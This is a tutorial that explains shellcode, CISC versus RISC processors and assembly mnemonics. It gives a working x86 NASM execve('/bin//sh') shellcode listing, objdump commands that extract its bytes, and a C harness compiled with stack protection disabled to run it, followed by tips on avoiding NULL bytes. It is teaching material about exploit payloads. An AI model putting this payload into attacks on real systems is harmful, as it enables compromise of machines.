Shellcode is a small piece of code used as the payload when exploiting a software vulnerability. It is so named because it typically starts a command shell from which the attacker can control the compromised machine.
Shellcode is essentially a sequence of carefully crafted machine instructions that run once the code has been injected into a running application. The processor executes these bytes directly, and the shellcode asks the kernel for services, such as spawning a shell, through system calls.
Shellcode does not need a compiler or interpreter at run time, because it is delivered in raw form as machine code bytes.
Let’s take a piece of C code and convert it into assembly code.
Shellcode is architecture specific. The two most common targets are Intel x86/x86-64 processors and ARM processors. Far more devices feature an ARM processor than an Intel processor.
Intel processors follow the CISC (Complex Instruction Set Computing) design: they have a larger, more feature-rich instruction set in which many complex instructions can access memory directly. ARM processors follow the RISC (Reduced Instruction Set Computing) design and therefore have a simplified instruction set (classically about 100 instructions or fewer) and more general-purpose registers than CISC.
CISC offers more operations and addressing modes than RISC, but fewer registers. CISC processors are mainly used in PCs, workstations, and servers. RISC processors are mainly used in phones, routers, and IoT devices.
In RISC, instructions can be executed more quickly, potentially allowing for greater speed: RISC designs shorten execution time by reducing the clock cycles needed per instruction.
Figure 1 shows which kinds of language are friendlier to humans and which are friendlier to the machine. High-level languages such as C, C++, and Python are more programmer friendly, whereas assembly language is more machine friendly.
A computer cannot run assembly code directly, because it needs machine code. Assembly language is a thin syntax layer on top of machine code: each assembly instruction corresponds to an instruction encoded in binary, which is what the processor understands. Writing machine code by hand is difficult, so we write assembly language instead, which is much easier for humans to understand, and let an assembler translate it.
Figure 1: Language hierarchy
Here is an example of a machine language instruction:
1110 0001 1010 0000 0010 0000 0000 0011
Nobody can remember such bit patterns, so mnemonics are used instead. A mnemonic is an abbreviation that gives each machine code instruction a name and helps us remember the binary pattern behind it. Mnemonics often consist of three letters, but this is not obligatory.
We write a program using these mnemonics as instructions. The resulting program is called an Assembly language program, and the set of mnemonics that is used to represent a computer’s machine code is called the Assembly language of that computer.
Shellcode Example
We will write the shellcode in assembly language. Working close to the machine level yields the most compact code, and since writing raw binary by hand is impractical, assembly is the lowest level at which we can comfortably produce useful and efficient shellcode.
The code below is written in 32-bit x86 assembly using NASM syntax:
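section .text
global _start

_start:
    ; execve("/bin//sh", NULL, NULL)
    xor ecx, ecx        ; ecx = 0 (argv = NULL)
    mul ecx             ; eax = 0 and edx = 0 (envp = NULL)
    push ecx            ; NULL terminator for the string
    push 0x68732f2f     ; "//sh" in little-endian order ("hs//" reversed)
    push 0x6e69622f     ; "/bin" in little-endian order ("nib/" reversed)
    mov ebx, esp        ; ebx points to "/bin//sh"
    mov al, 11          ; syscall number 11 = execve
    int 0x80            ; call the kernel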
Assemble it with NASM:
nasm -f elf32 shell.asm
Link the object file with the command below:
ld -melf_i386 -o shell shell.o
Extract the opcode bytes from the linked binary with the commands below. The first shows the disassembly, and the second prints the bytes as a \x-escaped string:
objdump -d shell
objdump -d shell | grep -Po '\s\K[a-f0-9]{2}(?=\s)' | sed 's/^/\\x/g' | perl -pe 's/\r?\n//' | sed 's/$/\n/'
# here shell is the file name
We will use the extracted hex code as the shellcode in the C program below:
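/* No headers are required: the program calls no library functions. */
unsigned char shellcode[] =
    "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80";

int main() {
    /* Treat the byte array as a function and call it. */
    int (*f)() = (int (*)())shellcode;
    f();
    return 0;
}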
Compiling and Running it:
gcc -m32 -fno-stack-protector -z execstack -o cshell cshell.c
./cshell
Shellcode specific aspects
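Things to note when writing shellcode:
- Don’t use direct (absolute) offsets to strings: the address at which the shellcode lands is not known in advance, so the code must be position independent, for example by building strings on the stack as in the listing above.
- Avoid NULL bytes when writing shellcode: payloads are often copied by string functions such as strcpy, which stop at the first 0x00 byte and would truncate the shellcode.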